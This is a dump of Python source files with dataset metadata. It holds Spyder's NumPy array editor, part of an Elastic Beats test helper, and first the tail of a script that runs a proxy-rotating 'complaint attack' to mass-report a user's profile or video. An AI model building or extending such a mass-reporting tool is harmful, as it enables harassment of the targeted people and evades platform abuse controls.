print_status(str(k + 1) + ". Transaction Opened!")
if (k == 5): print()
return
chunk = list(chunks(proxies, 10))
print("")
print_status("Video complaint attack is on!\n")
i = 1
for proxy_list in chunk:
p = Process(target=video_attack_process, args=(video_url, proxy_list,))
p.start()
print_status(str(i) + ". Transaction Opened!")
        if (i == 5): print()  # i is the transaction counter in this loop
i = i + 1
def profile_attack(proxies):
username = ask_question("Enter the username of the person you want to report")
print(Style.RESET_ALL)
if (len(proxies) == 0):
for k in range(5):
p = Process(target=profile_attack_process, args=(username, [],))
p.start()
print_status(str(k + 1) + ". Transaction Opened!")
return
chunk = list(chunks(proxies, 10))
print("")
print_status("Profile complaint attack is starting!\n")
i = 1
for proxy_list in chunk:
p = Process(target=profile_attack_process, args=(username, proxy_list,))
p.start()
print_status(str(i) + ". Transaction Opened!")
        if (i == 5): print()  # i is the transaction counter in this loop
i = i + 1
def main():
print_success("Modules loaded!\n")
ret = ask_question("Would you like to use a proxy? [Y / N]")
proxies = []
if (ret == "Y" or ret == "y"):
ret = ask_question("Would you like to collect your proxies from the internet? [Y / N]")
if (ret == "Y" or ret == "y"):
print_status("Gathering proxy from the Internet! This may take a while.\n")
proxies = find_proxies()
elif (ret == "N" or ret == "n"):
print_status("Please have a maximum of 50 proxies in a file!")
file_path = ask_question("Enter the path to your proxy list")
proxies = parse_proxy_file(file_path)
else:
print_error("Answer not understood, exiting!")
exit()
print_success(str(len(proxies)) + " Number of proxy found!\n")
elif (ret == "N" or ret == "n"):
pass
else:
print_error("Answer not understood, exiting!")
exit()
print("")
print_status("1 - Report Profile.")
print_status("2 - Report a video.")
report_choice = ask_question("Please select the complaint method")
print("")
if (report_choice.isdigit() == False):
print_error("The answer is not understood.")
exit(0)
if (int(report_choice) > 2 or int(report_choice) == 0):
print_error("The answer is not understood.")
exit(0)
if (int(report_choice) == 1):
profile_attack(proxies)
elif (int(report_choice) == 2):
video_attack(proxies)
if __name__ == "__main__":
print_logo()
try:
main()
print(Style.RESET_ALL)
except KeyboardInterrupt:
print("\n\n" + Fore.RED + "[*] Program is closing!")
print(Style.RESET_ALL)
        _exit(0)
```

avg_line_length 30.421053, max_line_length 96, alphanum_fraction 0.599048. Non-zero quality signals: num_words 611, num_chars 4,624, mean_word_length 4.360065, frac_words_unique 0.211129, frac_chars_top_2grams 0.04542, frac_chars_top_3grams 0.024399, frac_chars_top_4grams 0.035661, frac_chars_dupe_5grams 0.479354, frac_chars_dupe_6grams 0.418544, frac_chars_dupe_7grams 0.395646, frac_chars_dupe_8grams 0.374625, frac_chars_dupe_9grams 0.324324, frac_chars_dupe_10grams 0.201201, frac_chars_digital 0.01125, frac_chars_whitespace 0.288711, size_file_byte 4,624, num_lines 152, num_chars_line_max 97, num_chars_line_mean 30.421053, frac_chars_alphabet 0.798723, frac_chars_comments 0.016436, frac_lines_dupe_lines 0.466102, frac_chars_string_length 0.175131, py:cate_ast 1, py:frac_lines_func_ratio 0.050847, py:cate_var_zero false, py:frac_lines_pass 0.008475, py:frac_lines_import 0.127119, py:score_lines_no_logic 0.211864, py:frac_lines_print 0.279661. All other quality-signal columns are 0; the raw `qsc_*` counters are all 0 (`frac_words_unique` and `frac_lines_string_concat` null); effective 1, hits 0.
Row 12:

| hexsha | size | ext | lang |
|---|---|---|---|
| 864d054eec7d0aab41c1311c42de1bf952355469 | 33,765 | py | Python |

| | repo_path | repo_name | head_hexsha | licenses | count | event_min_datetime | event_max_datetime |
|---|---|---|---|---|---|---|---|
| max_stars | spyder/plugins/variableexplorer/widgets/arrayeditor.py | seryj/spyder | acea4f501c1a04d57b02e5e817708a69b503f430 | ["MIT"] | null | null | null |
| max_issues | spyder/plugins/variableexplorer/widgets/arrayeditor.py | seryj/spyder | acea4f501c1a04d57b02e5e817708a69b503f430 | ["MIT"] | null | null | null |
| max_forks | spyder/plugins/variableexplorer/widgets/arrayeditor.py | seryj/spyder | acea4f501c1a04d57b02e5e817708a69b503f430 | ["MIT"] | null | null | null |

content:

```python
# -*- coding: utf-8 -*-
#
# Copyright © Spyder Project Contributors
# Licensed under the terms of the MIT License
# (see spyder/__init__.py for details)
"""
NumPy Array Editor Dialog based on Qt
"""
# pylint: disable=C0103
# pylint: disable=R0903
# pylint: disable=R0911
# pylint: disable=R0201
# Standard library imports
from __future__ import print_function
# Third party imports
from qtpy.compat import from_qvariant, to_qvariant
from qtpy.QtCore import (QAbstractTableModel, QItemSelection, QLocale,
QItemSelectionRange, QModelIndex, Qt, Slot)
from qtpy.QtGui import QColor, QCursor, QDoubleValidator, QKeySequence
from qtpy.QtWidgets import (QAbstractItemDelegate, QApplication, QCheckBox,
QComboBox, QDialog, QDialogButtonBox, QGridLayout,
QHBoxLayout, QInputDialog, QItemDelegate, QLabel,
QLineEdit, QMenu, QMessageBox, QPushButton,
QSpinBox, QStackedWidget, QTableView, QVBoxLayout,
QWidget)
import numpy as np
# Local imports
from spyder.config.base import _
from spyder.config.fonts import DEFAULT_SMALL_DELTA
from spyder.config.gui import get_font, config_shortcut
from spyder.py3compat import (io, is_binary_string, is_string,
is_text_string, PY3, to_binary_string,
to_text_string)
from spyder.utils import icon_manager as ima
from spyder.utils.qthelpers import add_actions, create_action, keybinding
# Note: string and unicode data types will be formatted with '%s' (see below)
SUPPORTED_FORMATS = {
'single': '%.6g',
'double': '%.6g',
'float_': '%.6g',
'longfloat': '%.6g',
'float16': '%.6g',
'float32': '%.6g',
'float64': '%.6g',
'float96': '%.6g',
'float128': '%.6g',
'csingle': '%r',
'complex_': '%r',
'clongfloat': '%r',
'complex64': '%r',
'complex128': '%r',
'complex192': '%r',
'complex256': '%r',
'byte': '%d',
'bytes8': '%s',
'short': '%d',
'intc': '%d',
'int_': '%d',
'longlong': '%d',
'intp': '%d',
'int8': '%d',
'int16': '%d',
'int32': '%d',
'int64': '%d',
'ubyte': '%d',
'ushort': '%d',
'uintc': '%d',
'uint': '%d',
'ulonglong': '%d',
'uintp': '%d',
'uint8': '%d',
'uint16': '%d',
'uint32': '%d',
'uint64': '%d',
'bool_': '%r',
'bool8': '%r',
'bool': '%r',
}
LARGE_SIZE = 5e5
LARGE_NROWS = 1e5
LARGE_COLS = 60
#==============================================================================
# Utility functions
#==============================================================================
def is_float(dtype):
"""Return True if datatype dtype is a float kind"""
return ('float' in dtype.name) or dtype.name in ['single', 'double']
def is_number(dtype):
"""Return True is datatype dtype is a number kind"""
return is_float(dtype) or ('int' in dtype.name) or ('long' in dtype.name) \
or ('short' in dtype.name)
def get_idx_rect(index_list):
"""Extract the boundaries from a list of indexes"""
rows, cols = list(zip(*[(i.row(), i.column()) for i in index_list]))
return ( min(rows), max(rows), min(cols), max(cols) )
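# Illustrative only (not in the original module): for QModelIndex objects
# spanning rows 2..5 and columns 1..3, get_idx_rect returns (2, 5, 1, 3),
# i.e. (min_row, max_row, min_col, max_col).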
#==============================================================================
# Main classes
#==============================================================================
class ArrayModel(QAbstractTableModel):
"""Array Editor Table Model"""
ROWS_TO_LOAD = 500
COLS_TO_LOAD = 40
def __init__(self, data, format="%.6g", xlabels=None, ylabels=None,
readonly=False, parent=None):
QAbstractTableModel.__init__(self)
self.dialog = parent
self.changes = {}
self.xlabels = xlabels
self.ylabels = ylabels
self.readonly = readonly
self.test_array = np.array([0], dtype=data.dtype)
# for complex numbers, shading will be based on absolute value
# but for all other types it will be the real part
if data.dtype in (np.complex64, np.complex128):
self.color_func = np.abs
else:
self.color_func = np.real
# Background color settings
huerange = [.66, .99] # Hue
self.sat = .7 # Saturation
self.val = 1. # Value
self.alp = .6 # Alpha-channel
self._data = data
self._format = format
self.total_rows = self._data.shape[0]
self.total_cols = self._data.shape[1]
size = self.total_rows * self.total_cols
try:
self.vmin = np.nanmin(self.color_func(data))
self.vmax = np.nanmax(self.color_func(data))
if self.vmax == self.vmin:
self.vmin -= 1
self.hue0 = huerange[0]
self.dhue = huerange[1]-huerange[0]
self.bgcolor_enabled = True
except (TypeError, ValueError):
self.vmin = None
self.vmax = None
self.hue0 = None
self.dhue = None
self.bgcolor_enabled = False
# Use paging when the total size, number of rows or number of
# columns is too large
if size > LARGE_SIZE:
self.rows_loaded = self.ROWS_TO_LOAD
self.cols_loaded = self.COLS_TO_LOAD
else:
if self.total_rows > LARGE_NROWS:
self.rows_loaded = self.ROWS_TO_LOAD
else:
self.rows_loaded = self.total_rows
if self.total_cols > LARGE_COLS:
self.cols_loaded = self.COLS_TO_LOAD
else:
self.cols_loaded = self.total_cols
def get_format(self):
"""Return current format"""
# Avoid accessing the private attribute _format from outside
return self._format
def get_data(self):
"""Return data"""
return self._data
def set_format(self, format):
"""Change display format"""
self._format = format
self.reset()
def columnCount(self, qindex=QModelIndex()):
"""Array column number"""
if self.total_cols <= self.cols_loaded:
return self.total_cols
else:
return self.cols_loaded
def rowCount(self, qindex=QModelIndex()):
"""Array row number"""
if self.total_rows <= self.rows_loaded:
return self.total_rows
else:
return self.rows_loaded
def can_fetch_more(self, rows=False, columns=False):
if rows:
if self.total_rows > self.rows_loaded:
return True
else:
return False
if columns:
if self.total_cols > self.cols_loaded:
return True
else:
return False
def fetch_more(self, rows=False, columns=False):
if self.can_fetch_more(rows=rows):
remainder = self.total_rows - self.rows_loaded
items_to_fetch = min(remainder, self.ROWS_TO_LOAD)
self.beginInsertRows(QModelIndex(), self.rows_loaded,
self.rows_loaded + items_to_fetch - 1)
self.rows_loaded += items_to_fetch
self.endInsertRows()
if self.can_fetch_more(columns=columns):
remainder = self.total_cols - self.cols_loaded
items_to_fetch = min(remainder, self.COLS_TO_LOAD)
self.beginInsertColumns(QModelIndex(), self.cols_loaded,
self.cols_loaded + items_to_fetch - 1)
self.cols_loaded += items_to_fetch
self.endInsertColumns()
def bgcolor(self, state):
"""Toggle backgroundcolor"""
self.bgcolor_enabled = state > 0
self.reset()
def get_value(self, index):
i = index.row()
j = index.column()
if len(self._data.shape) == 1:
value = self._data[j]
else:
value = self._data[i, j]
return self.changes.get((i, j), value)
def data(self, index, role=Qt.DisplayRole):
"""Cell content"""
if not index.isValid():
return to_qvariant()
value = self.get_value(index)
if is_binary_string(value):
try:
value = to_text_string(value, 'utf8')
except:
pass
if role == Qt.DisplayRole:
if value is np.ma.masked:
return ''
else:
try:
return to_qvariant(self._format % value)
except TypeError:
self.readonly = True
return repr(value)
elif role == Qt.TextAlignmentRole:
return to_qvariant(int(Qt.AlignCenter|Qt.AlignVCenter))
elif role == Qt.BackgroundColorRole and self.bgcolor_enabled \
and value is not np.ma.masked:
try:
hue = (self.hue0 +
self.dhue * (float(self.vmax) - self.color_func(value))
/ (float(self.vmax) - self.vmin))
hue = float(np.abs(hue))
color = QColor.fromHsvF(hue, self.sat, self.val, self.alp)
return to_qvariant(color)
except TypeError:
return to_qvariant()
elif role == Qt.FontRole:
return to_qvariant(get_font(font_size_delta=DEFAULT_SMALL_DELTA))
return to_qvariant()
def setData(self, index, value, role=Qt.EditRole):
"""Cell content change"""
if not index.isValid() or self.readonly:
return False
i = index.row()
j = index.column()
value = from_qvariant(value, str)
dtype = self._data.dtype.name
if dtype == "bool":
try:
val = bool(float(value))
except ValueError:
val = value.lower() == "true"
elif dtype.startswith("string") or dtype.startswith("bytes"):
val = to_binary_string(value, 'utf8')
elif dtype.startswith("unicode") or dtype.startswith("str"):
val = to_text_string(value)
else:
if value.lower().startswith('e') or value.lower().endswith('e'):
return False
try:
val = complex(value)
if not val.imag:
val = val.real
except ValueError as e:
QMessageBox.critical(self.dialog, "Error",
"Value error: %s" % str(e))
return False
try:
self.test_array[0] = val # will raise an Exception eventually
except OverflowError as e:
print("OverflowError: " + str(e)) # spyder: test-skip
QMessageBox.critical(self.dialog, "Error",
"Overflow error: %s" % str(e))
return False
# Add change to self.changes
self.changes[(i, j)] = val
self.dataChanged.emit(index, index)
if not is_string(val):
if val > self.vmax:
self.vmax = val
if val < self.vmin:
self.vmin = val
return True
def flags(self, index):
"""Set editable flag"""
if not index.isValid():
return Qt.ItemIsEnabled
return Qt.ItemFlags(QAbstractTableModel.flags(self, index)|
Qt.ItemIsEditable)
def headerData(self, section, orientation, role=Qt.DisplayRole):
"""Set header data"""
if role != Qt.DisplayRole:
return to_qvariant()
labels = self.xlabels if orientation == Qt.Horizontal else self.ylabels
if labels is None:
return to_qvariant(int(section))
else:
return to_qvariant(labels[section])
def reset(self):
self.beginResetModel()
self.endResetModel()
class ArrayDelegate(QItemDelegate):
"""Array Editor Item Delegate"""
def __init__(self, dtype, parent=None):
QItemDelegate.__init__(self, parent)
self.dtype = dtype
def createEditor(self, parent, option, index):
"""Create editor widget"""
model = index.model()
value = model.get_value(index)
if model._data.dtype.name == "bool":
value = not value
model.setData(index, to_qvariant(value))
return
elif value is not np.ma.masked:
editor = QLineEdit(parent)
editor.setFont(get_font(font_size_delta=DEFAULT_SMALL_DELTA))
editor.setAlignment(Qt.AlignCenter)
if is_number(self.dtype):
validator = QDoubleValidator(editor)
validator.setLocale(QLocale('C'))
editor.setValidator(validator)
editor.returnPressed.connect(self.commitAndCloseEditor)
return editor
def commitAndCloseEditor(self):
"""Commit and close editor"""
editor = self.sender()
# Avoid a segfault with PyQt5. The variable value won't be changed,
# but at least Spyder won't crash. It seems to be caused by a bug in sip.
try:
self.commitData.emit(editor)
except AttributeError:
pass
self.closeEditor.emit(editor, QAbstractItemDelegate.NoHint)
def setEditorData(self, editor, index):
"""Set editor widget's data"""
text = from_qvariant(index.model().data(index, Qt.DisplayRole), str)
editor.setText(text)
#TODO: Implement "Paste" (from clipboard) feature
class ArrayView(QTableView):
"""Array view class"""
def __init__(self, parent, model, dtype, shape):
QTableView.__init__(self, parent)
self.setModel(model)
self.setItemDelegate(ArrayDelegate(dtype, self))
total_width = 0
for k in range(shape[1]):
total_width += self.columnWidth(k)
self.viewport().resize(min(total_width, 1024), self.height())
self.shape = shape
self.menu = self.setup_menu()
config_shortcut(self.copy, context='variable_explorer', name='copy',
parent=self)
self.horizontalScrollBar().valueChanged.connect(
lambda val: self.load_more_data(val, columns=True))
self.verticalScrollBar().valueChanged.connect(
lambda val: self.load_more_data(val, rows=True))
def load_more_data(self, value, rows=False, columns=False):
try:
old_selection = self.selectionModel().selection()
old_rows_loaded = old_cols_loaded = None
if rows and value == self.verticalScrollBar().maximum():
old_rows_loaded = self.model().rows_loaded
self.model().fetch_more(rows=rows)
if columns and value == self.horizontalScrollBar().maximum():
old_cols_loaded = self.model().cols_loaded
self.model().fetch_more(columns=columns)
if old_rows_loaded is not None or old_cols_loaded is not None:
# if we've changed anything, update selection
new_selection = QItemSelection()
for part in old_selection:
top = part.top()
bottom = part.bottom()
if (old_rows_loaded is not None and
top == 0 and bottom == (old_rows_loaded-1)):
# complete column selected (so expand it to match
# updated range)
bottom = self.model().rows_loaded-1
left = part.left()
right = part.right()
if (old_cols_loaded is not None
and left == 0 and right == (old_cols_loaded-1)):
# complete row selected (so expand it to match updated
# range)
right = self.model().cols_loaded-1
top_left = self.model().index(top, left)
bottom_right = self.model().index(bottom, right)
part = QItemSelectionRange(top_left, bottom_right)
new_selection.append(part)
self.selectionModel().select(
new_selection, self.selectionModel().ClearAndSelect)
except NameError:
# Needed to handle a NameError while fetching data when closing
# See issue 7880
pass
def resize_to_contents(self):
"""Resize cells to contents"""
QApplication.setOverrideCursor(QCursor(Qt.WaitCursor))
self.resizeColumnsToContents()
self.model().fetch_more(columns=True)
self.resizeColumnsToContents()
QApplication.restoreOverrideCursor()
def setup_menu(self):
"""Setup context menu"""
self.copy_action = create_action(self, _('Copy'),
shortcut=keybinding('Copy'),
icon=ima.icon('editcopy'),
triggered=self.copy,
context=Qt.WidgetShortcut)
menu = QMenu(self)
add_actions(menu, [self.copy_action, ])
return menu
def contextMenuEvent(self, event):
"""Reimplement Qt method"""
self.menu.popup(event.globalPos())
event.accept()
def keyPressEvent(self, event):
"""Reimplement Qt method"""
if event == QKeySequence.Copy:
self.copy()
else:
QTableView.keyPressEvent(self, event)
def _sel_to_text(self, cell_range):
"""Copy an array portion to a unicode string"""
if not cell_range:
return
row_min, row_max, col_min, col_max = get_idx_rect(cell_range)
if col_min == 0 and col_max == (self.model().cols_loaded-1):
# we've selected a whole column. It isn't possible to
# select only the first part of a column without loading more,
# so we can treat it as intentional and copy the whole thing
col_max = self.model().total_cols-1
if row_min == 0 and row_max == (self.model().rows_loaded-1):
row_max = self.model().total_rows-1
_data = self.model().get_data()
if PY3:
output = io.BytesIO()
else:
output = io.StringIO()
try:
np.savetxt(output, _data[row_min:row_max+1, col_min:col_max+1],
delimiter='\t', fmt=self.model().get_format())
except:
QMessageBox.warning(self, _("Warning"),
_("It was not possible to copy values for "
"this array"))
return
contents = output.getvalue().decode('utf-8')
output.close()
return contents
@Slot()
def copy(self):
"""Copy text to clipboard"""
cliptxt = self._sel_to_text( self.selectedIndexes() )
clipboard = QApplication.clipboard()
clipboard.setText(cliptxt)
class ArrayEditorWidget(QWidget):
def __init__(self, parent, data, readonly=False,
xlabels=None, ylabels=None):
QWidget.__init__(self, parent)
self.data = data
self.old_data_shape = None
if len(self.data.shape) == 1:
self.old_data_shape = self.data.shape
self.data.shape = (self.data.shape[0], 1)
elif len(self.data.shape) == 0:
self.old_data_shape = self.data.shape
self.data.shape = (1, 1)
format = SUPPORTED_FORMATS.get(data.dtype.name, '%s')
self.model = ArrayModel(self.data, format=format, xlabels=xlabels,
ylabels=ylabels, readonly=readonly, parent=self)
self.view = ArrayView(self, self.model, data.dtype, data.shape)
btn_layout = QHBoxLayout()
btn_layout.setAlignment(Qt.AlignLeft)
btn = QPushButton(_( "Format"))
# disable format button for int type
btn.setEnabled(is_float(data.dtype))
btn_layout.addWidget(btn)
btn.clicked.connect(self.change_format)
btn = QPushButton(_( "Resize"))
btn_layout.addWidget(btn)
btn.clicked.connect(self.view.resize_to_contents)
bgcolor = QCheckBox(_( 'Background color'))
bgcolor.setChecked(self.model.bgcolor_enabled)
bgcolor.setEnabled(self.model.bgcolor_enabled)
bgcolor.stateChanged.connect(self.model.bgcolor)
btn_layout.addWidget(bgcolor)
layout = QVBoxLayout()
layout.addWidget(self.view)
layout.addLayout(btn_layout)
self.setLayout(layout)
def accept_changes(self):
"""Accept changes"""
for (i, j), value in list(self.model.changes.items()):
self.data[i, j] = value
if self.old_data_shape is not None:
self.data.shape = self.old_data_shape
def reject_changes(self):
"""Reject changes"""
if self.old_data_shape is not None:
self.data.shape = self.old_data_shape
def change_format(self):
"""Change display format"""
format, valid = QInputDialog.getText(self, _( 'Format'),
_( "Float formatting"),
QLineEdit.Normal, self.model.get_format())
if valid:
format = str(format)
try:
format % 1.1
except:
QMessageBox.critical(self, _("Error"),
_("Format (%s) is incorrect") % format)
return
self.model.set_format(format)
class ArrayEditor(QDialog):
"""Array Editor Dialog"""
def __init__(self, parent=None):
QDialog.__init__(self, parent)
# Destroy the C++ object right after closing the dialog box;
# otherwise it may be garbage-collected in another QThread
# (e.g. the editor's analysis thread in Spyder), thus leading to
# a segmentation fault on UNIX or an application crash on Windows
self.setAttribute(Qt.WA_DeleteOnClose)
self.data = None
self.arraywidget = None
self.stack = None
self.layout = None
self.btn_save_and_close = None
self.btn_close = None
# Values for 3d array editor
self.dim_indexes = [{}, {}, {}]
self.last_dim = 0 # Adjust this for changing the startup dimension
def setup_and_check(self, data, title='', readonly=False,
xlabels=None, ylabels=None):
"""
Setup ArrayEditor:
return False if data is not supported, True otherwise
"""
self.data = data
readonly = readonly or not self.data.flags.writeable
is_record_array = data.dtype.names is not None
is_masked_array = isinstance(data, np.ma.MaskedArray)
if data.ndim > 3:
self.error(_("Arrays with more than 3 dimensions are not "
"supported"))
return False
if xlabels is not None and len(xlabels) != self.data.shape[1]:
self.error(_("The 'xlabels' argument length do no match array "
"column number"))
return False
if ylabels is not None and len(ylabels) != self.data.shape[0]:
self.error(_("The 'ylabels' argument length do no match array row "
"number"))
return False
if not is_record_array:
dtn = data.dtype.name
if dtn not in SUPPORTED_FORMATS and not dtn.startswith('str') \
and not dtn.startswith('unicode'):
arr = _("%s arrays") % data.dtype.name
self.error(_("%s are currently not supported") % arr)
return False
self.layout = QGridLayout()
self.setLayout(self.layout)
self.setWindowIcon(ima.icon('arredit'))
if title:
title = to_text_string(title) + " - " + _("NumPy array")
else:
title = _("Array editor")
if readonly:
title += ' (' + _('read only') + ')'
self.setWindowTitle(title)
self.resize(600, 500)
# Stack widget
self.stack = QStackedWidget(self)
if is_record_array:
for name in data.dtype.names:
self.stack.addWidget(ArrayEditorWidget(self, data[name],
readonly, xlabels, ylabels))
elif is_masked_array:
self.stack.addWidget(ArrayEditorWidget(self, data, readonly,
xlabels, ylabels))
self.stack.addWidget(ArrayEditorWidget(self, data.data, readonly,
xlabels, ylabels))
self.stack.addWidget(ArrayEditorWidget(self, data.mask, readonly,
xlabels, ylabels))
elif data.ndim == 3:
pass
else:
self.stack.addWidget(ArrayEditorWidget(self, data, readonly,
xlabels, ylabels))
self.arraywidget = self.stack.currentWidget()
if self.arraywidget:
self.arraywidget.model.dataChanged.connect(
self.save_and_close_enable)
self.stack.currentChanged.connect(self.current_widget_changed)
self.layout.addWidget(self.stack, 1, 0)
# Buttons configuration
btn_layout = QHBoxLayout()
if is_record_array or is_masked_array or data.ndim == 3:
if is_record_array:
btn_layout.addWidget(QLabel(_("Record array fields:")))
names = []
for name in data.dtype.names:
field = data.dtype.fields[name]
text = name
if len(field) >= 3:
title = field[2]
if not is_text_string(title):
title = repr(title)
text += ' - '+title
names.append(text)
else:
names = [_('Masked data'), _('Data'), _('Mask')]
if data.ndim == 3:
# QSpinBox
self.index_spin = QSpinBox(self, keyboardTracking=False)
self.index_spin.valueChanged.connect(self.change_active_widget)
# QComboBox
names = [str(i) for i in range(3)]
ra_combo = QComboBox(self)
ra_combo.addItems(names)
ra_combo.currentIndexChanged.connect(self.current_dim_changed)
# Adding the widgets to layout
label = QLabel(_("Axis:"))
btn_layout.addWidget(label)
btn_layout.addWidget(ra_combo)
self.shape_label = QLabel()
btn_layout.addWidget(self.shape_label)
label = QLabel(_("Index:"))
btn_layout.addWidget(label)
btn_layout.addWidget(self.index_spin)
self.slicing_label = QLabel()
btn_layout.addWidget(self.slicing_label)
# set the widget to display when launched
self.current_dim_changed(self.last_dim)
else:
ra_combo = QComboBox(self)
ra_combo.currentIndexChanged.connect(self.stack.setCurrentIndex)
ra_combo.addItems(names)
btn_layout.addWidget(ra_combo)
if is_masked_array:
label = QLabel(_("<u>Warning</u>: changes are applied separately"))
label.setToolTip(_("For performance reasons, changes applied "\
"to masked array won't be reflected in "\
"array's data (and vice-versa)."))
btn_layout.addWidget(label)
btn_layout.addStretch()
if not readonly:
self.btn_save_and_close = QPushButton(_('Save and Close'))
self.btn_save_and_close.setDisabled(True)
self.btn_save_and_close.clicked.connect(self.accept)
btn_layout.addWidget(self.btn_save_and_close)
self.btn_close = QPushButton(_('Close'))
self.btn_close.setAutoDefault(True)
self.btn_close.setDefault(True)
self.btn_close.clicked.connect(self.reject)
btn_layout.addWidget(self.btn_close)
self.layout.addLayout(btn_layout, 2, 0)
self.setMinimumSize(400, 300)
# Make the dialog act as a window
self.setWindowFlags(Qt.Window)
return True
@Slot(QModelIndex, QModelIndex)
def save_and_close_enable(self, left_top, bottom_right):
"""Handle the data change event to enable the save and close button."""
if self.btn_save_and_close:
self.btn_save_and_close.setEnabled(True)
self.btn_save_and_close.setAutoDefault(True)
self.btn_save_and_close.setDefault(True)
def current_widget_changed(self, index):
self.arraywidget = self.stack.widget(index)
self.arraywidget.model.dataChanged.connect(self.save_and_close_enable)
def change_active_widget(self, index):
"""
This is implemented to handle negative index values for
3d arrays, giving the same behavior as slicing
"""
string_index = [':']*3
string_index[self.last_dim] = '<font color=red>%i</font>'
self.slicing_label.setText((r"Slicing: [" + ", ".join(string_index) +
"]") % index)
if index < 0:
data_index = self.data.shape[self.last_dim] + index
else:
data_index = index
slice_index = [slice(None)]*3
slice_index[self.last_dim] = data_index
stack_index = self.dim_indexes[self.last_dim].get(data_index)
if stack_index is None:
stack_index = self.stack.count()
try:
self.stack.addWidget(ArrayEditorWidget(
self, self.data[tuple(slice_index)]))
except IndexError: # Handle arrays of size 0 in one axis
self.stack.addWidget(ArrayEditorWidget(self, self.data))
self.dim_indexes[self.last_dim][data_index] = stack_index
self.stack.update()
self.stack.setCurrentIndex(stack_index)
def current_dim_changed(self, index):
"""
This changes the active axis that the array editor is plotting
over in 3D
"""
self.last_dim = index
string_size = ['%i']*3
string_size[index] = '<font color=red>%i</font>'
self.shape_label.setText(('Shape: (' + ', '.join(string_size) +
') ') % self.data.shape)
if self.index_spin.value() != 0:
self.index_spin.setValue(0)
else:
# this is needed because if the value is already 0, setting it
# to 0 does not emit the valueChanged(int) signal
self.change_active_widget(0)
self.index_spin.setRange(-self.data.shape[index],
self.data.shape[index]-1)
@Slot()
def accept(self):
"""Reimplement Qt method"""
for index in range(self.stack.count()):
self.stack.widget(index).accept_changes()
QDialog.accept(self)
def get_value(self):
"""Return modified array -- this is *not* a copy"""
# It is important to avoid accessing the Qt C++ object as it has probably
# already been destroyed, due to the Qt.WA_DeleteOnClose attribute
return self.data
def error(self, message):
"""An error occured, closing the dialog box"""
QMessageBox.critical(self, _("Array editor"), message)
self.setAttribute(Qt.WA_DeleteOnClose)
self.reject()
@Slot()
def reject(self):
"""Reimplement Qt method"""
if self.arraywidget is not None:
for index in range(self.stack.count()):
self.stack.widget(index).reject_changes()
QDialog.reject(self)
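# Illustrative usage sketch (not part of the original module), assuming a
# running Qt event loop:
#
#     import numpy as np
#     from qtpy.QtWidgets import QApplication
#     app = QApplication([])
#     arr = np.arange(12.0).reshape(3, 4)
#     dlg = ArrayEditor()
#     if dlg.setup_and_check(arr, title="demo"):
#         dlg.exec_()  # "Save and Close" writes edits back into `arr`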
| 39.817217
| 84
| 0.53206
| 3,540
| 33,765
| 4.926836
| 0.180226
| 0.017889
| 0.013417
| 0.007224
| 0.207672
| 0.160197
| 0.102632
| 0.080901
| 0.043575
| 0.038186
| 0
| 0.008448
| 0.361943
| 33,765
| 847
| 85
| 39.864227
| 0.801058
| 0.107449
| 0
| 0.187017
| 0
| 0
| 0.043203
| 0
| 0
| 0
| 0
| 0.001181
| 0
| 1
| 0.068006
| false
| 0.006182
| 0.018547
| 0
| 0.16847
| 0.003091
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
864d134a9c98ae3913986fb31b160d825e4250a2
| 4,638
|
py
|
Python
|
libbeat/tests/system/idxmgmt.py
|
dddpaul/beats
|
0d4a830fea46210ee264c52a977834d39493c750
|
[
"ECL-2.0",
"Apache-2.0"
] | 4
|
2020-11-17T06:29:30.000Z
|
2021-08-08T11:56:01.000Z
|
libbeat/tests/system/idxmgmt.py
|
dddpaul/beats
|
0d4a830fea46210ee264c52a977834d39493c750
|
[
"ECL-2.0",
"Apache-2.0"
] | 6
|
2020-06-23T16:28:27.000Z
|
2020-10-05T17:52:01.000Z
|
libbeat/tests/system/idxmgmt.py
|
dddpaul/beats
|
0d4a830fea46210ee264c52a977834d39493c750
|
[
"ECL-2.0",
"Apache-2.0"
] | 2
|
2020-10-26T15:34:06.000Z
|
2021-12-10T08:51:58.000Z
|
import datetime
import unittest
import pytest
from elasticsearch import NotFoundError
class IdxMgmt(unittest.TestCase):
def __init__(self, client, index):
self._client = client
self._index = index if index != '' and index != '*' else 'mockbeat'
def needs_init(self, s):
return s == '' or s == '*'
def delete(self, indices=[], policies=[]):
indices = [x for x in indices if x != '']
if not indices:
indices = [self._index]
for i in indices:
self.delete_index_and_alias(i)
self.delete_template(template=i)
for i in [x for x in policies if x != '']:
self.delete_policy(i)
def delete_index_and_alias(self, index=""):
if self.needs_init(index):
index = self._index
try:
self._client.transport.perform_request('DELETE', "/" + index + "*")
except NotFoundError:
pass
def delete_template(self, template=""):
if self.needs_init(template):
template = self._index
try:
self._client.transport.perform_request('DELETE', "/_template/" + template + "*")
except NotFoundError:
pass
def delete_policy(self, policy):
# Delete any existing policy starting with given policy
policies = self._client.transport.perform_request('GET', "/_ilm/policy")
for p, _ in policies.items():
if not p.startswith(policy):
continue
try:
self._client.transport.perform_request('DELETE', "/_ilm/policy/" + p)
except NotFoundError:
pass
def assert_index_template_not_loaded(self, template):
with pytest.raises(NotFoundError):
self._client.transport.perform_request('GET', '/_template/' + template)
def assert_index_template_loaded(self, template):
resp = self._client.transport.perform_request('GET', '/_template/' + template)
assert template in resp
assert "lifecycle" not in resp[template]["settings"]["index"]
def assert_ilm_template_loaded(self, template, policy, alias):
resp = self._client.transport.perform_request('GET', '/_template/' + template)
assert resp[template]["settings"]["index"]["lifecycle"]["name"] == policy
assert resp[template]["settings"]["index"]["lifecycle"]["rollover_alias"] == alias
def assert_index_template_index_pattern(self, template, index_pattern):
resp = self._client.transport.perform_request('GET', '/_template/' + template)
assert template in resp
assert resp[template]["index_patterns"] == index_pattern
def assert_alias_not_created(self, alias):
resp = self._client.transport.perform_request('GET', '/_alias')
for name, entry in resp.items():
if alias not in name:
continue
assert entry["aliases"] == {}, entry["aliases"]
def assert_alias_created(self, alias, pattern=None):
if pattern is None:
pattern = self.default_pattern()
name = alias + "-" + pattern
resp = self._client.transport.perform_request('GET', '/_alias/' + alias)
assert name in resp
assert resp[name]["aliases"][alias]["is_write_index"] == True
def assert_policy_not_created(self, policy):
with pytest.raises(NotFoundError):
self._client.transport.perform_request('GET', '/_ilm/policy/' + policy)
def assert_policy_created(self, policy):
